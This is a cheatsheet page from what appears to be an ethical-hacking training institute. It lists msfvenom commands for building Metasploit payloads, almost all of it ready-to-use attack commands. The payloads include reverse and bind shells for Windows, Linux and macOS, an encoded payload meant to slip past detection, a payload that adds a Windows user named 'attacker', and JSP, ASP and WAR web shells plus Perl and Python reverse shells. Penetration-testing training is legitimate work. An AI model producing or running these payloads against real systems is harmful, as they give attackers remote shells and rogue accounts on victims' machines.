Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity

A quick custom cheatsheet for creating payloads using msfvenom. Major chunk of work happens around these payloads.For more info refer: (Note: RHOST is not mandatory in any of the bind shells)

Listing payloads
msfvenom -l

Windows Paylaods
Reverse Shell :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Bind Shell:
msfvenom -p windows/meterpreter/bind_tcp RHOST= (IP Address) LPORT=(Your Port) -f exe > bind.exe

Create User:
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

CMD shell:
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe

Encoder:
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe

One can also use the -a to specify the architecture or the --platform

Linux Payloads
Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf

Bind Shell:
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

Generic Shell:
msfvenom -p generic/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > term.elf

MAC Paylaods
Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho

Bind Shell:
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho

Web Based Payloads

ASP
Reverse shell :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp

JSP
Reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp

WAR
Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war

Script Langauge payloads

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py